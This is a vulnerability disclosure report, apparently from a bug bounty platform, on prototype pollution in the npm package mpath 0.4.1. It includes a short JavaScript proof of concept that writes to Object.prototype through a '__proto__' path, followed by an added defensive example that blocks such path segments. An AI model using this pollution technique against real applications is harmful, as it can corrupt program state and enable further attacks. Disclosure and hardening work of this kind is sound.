Prototype Pollution Vulnerability in mpath Package

High
N
Node.js third-party modules
Submitted None
Reported by cris_semmle

Vulnerability Details

Technical details and impact analysis

I would like to report a prototype pollution vulnerability in mpath. It allows an attacker to inject arbitrary properties on Object.prototype.

# Module

**module name:** mpath
**version:** 0.4.1
**npm page:** `https://www.npmjs.com/package/mpath`

## Module Description

{G,S}et javascript object values using MongoDB-like path notation

## Module Stats

305,874 downloads in the last week

# Vulnerability

## Vulnerability Description

An attacker can specify a path that includes the prototype object, and thus overwrite important properties on Object.prototype or add new ones.

## Steps To Reproduce:

```js
var mpath = require("mpath");

var obj = {
  comments: [
    { title: 'funny' },
    { title: 'exciting!' }
  ]
};

// The path walks into __proto__, so the write lands on Object.prototype
// and shows up on an unrelated, freshly created object.
mpath.set('__proto__.x', ['hilarious', 'fruity'], obj);
console.log({}.x);
```

## Patch

N/A. Validate property names before overwriting them and prevent writes to certain paths.

# Wrap up

- I contacted the maintainer to let them know: [N
- I opened an issue in the related repository: N

## Impact

This may be an intended behaviour of this module, but it needs to be better documented. Moreover, to properly analyse the impact of this vulnerability one must look at the clients of this module, such as mongoose, and see if attackers can realistically control the path value.
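The fix the report suggests (validate each path segment and refuse writes to prototype-reaching keys) in a small dotted-path setter. This is an added illustration, not mpath's code or the reporter's; the names `isSafePath`, `safeSet` and `prototypeIsPolluted` are hypothetical, and the setter only supports the plain `a.b.c` / array-index subset of the path syntax.

```javascript
// Path segments that let a dotted path reach Object.prototype (directly via
// __proto__, or via constructor.prototype). A defensive setter refuses them.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// True when every segment of a dotted path is a non-empty, non-forbidden name.
function isSafePath(path) {
  if (typeof path !== 'string' || path.length === 0) return false;
  return path
    .split('.')
    .every((seg) => seg.length > 0 && !FORBIDDEN_KEYS.has(seg));
}

// Hypothetical hardened counterpart of mpath.set(path, value, obj):
// intermediate objects are created on demand, but the path is validated
// first, so the walk can never step onto Object.prototype.
function safeSet(path, value, obj) {
  if (!isSafePath(path)) {
    throw new TypeError('refusing to write unsafe path: ' + path);
  }
  const parts = path.split('.');
  let cur = obj;
  for (let i = 0; i < parts.length - 1; i++) {
    const key = parts[i];
    // Only descend into own, object-valued properties; otherwise create one.
    const own = Object.prototype.hasOwnProperty.call(cur, key);
    if (!own || typeof cur[key] !== 'object' || cur[key] === null) {
      cur[key] = {};
    }
    cur = cur[key];
  }
  cur[parts[parts.length - 1]] = value;
  return obj;
}

// Post-condition check a test suite can run after exercising path setters:
// has Object.prototype acquired an own property with this name?
function prototypeIsPolluted(key) {
  return Object.prototype.hasOwnProperty.call(Object.prototype, key);
}
```

Running the report's reproducer through `safeSet` instead of `mpath.set` throws before any write, and `prototypeIsPolluted('x')` stays false.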

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted